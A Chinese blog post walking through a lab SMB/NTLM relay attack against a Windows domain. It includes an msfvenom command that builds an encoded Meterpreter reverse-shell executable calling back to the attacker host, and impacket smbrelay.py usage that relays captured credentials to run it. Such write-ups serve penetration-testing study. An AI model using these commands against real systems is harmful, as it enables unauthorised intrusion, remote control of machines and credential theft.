smb中继攻击

  1. 0x00介绍
  2. 0x01实验过程
  3. 0x02结论
  4. 0x03参考链接

0x00介绍

先知社区的文章:

SMB重放攻击:当访问格式为\IP\File的时候,会默认将当前用户密码凭证送到SMB服务进行认证,失败后才弹出需要输用户密码的对话框,但此时SMB服务器已经收到了相应数据,通过抓包即能获取到用户凭证。
有了这个凭证,再进一步利用Hashcat等工具进行破解即有可能 得到能利用的用户密码。

个人理解:

0x01实验过程

内网有三台主机->

Windows server 2008 R2 DC:192.168.1.108
Windows server 2008 R2:192.168.1.110
Kali:192.168.1.109

kali实现端口流量转发,域内主机(110那台)访问了攻击机的IP,输入了凭证之后。将凭证交给攻击者后,攻击机将凭证转交给DC。如果DC登录成功,则代表验证成功。将上传攻击机生成的马子并执行

在kali上监听生成马子并监听msf

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=4444 -e x64/xor -i 20 -f exe -o test.exe

使用impacket工具包里的smbrelay

命令格式:python smbrelay.py -h <被攻击的机子> -e <认证成功后执行的马>

在使用server02访问kali IP

成功后会抓到正确的NTLM-HASH-HASH

msf也会上线

如果认证失败则返回错误信息

0x02结论

我认为实际上成功几率应该很低,钓鱼拿hash的方法应该更高(虽然破解hash是个问题)。先知社区那篇文章结尾那个方法,通过中继dump SAM文件里的HASH,拿到NT LM HASH后。使用wmicexec直接连接即可(虽然也是中继)

先设置responder.conf,关闭smb和http

0x03参考链接

内网渗透——针对hash的攻击 - 安全客,安全资讯平台
smb重放攻击 [smb中间人] - klion’s blog
钓鱼配合smb重放攻击 - 先知社区


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:smb中继攻击

本文作者:九世

发布时间:2020-03-22, 10:24:45

最后更新:2020-03-22, 14:05:37

原始链接:http://jiushill.github.io/posts/99700841.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录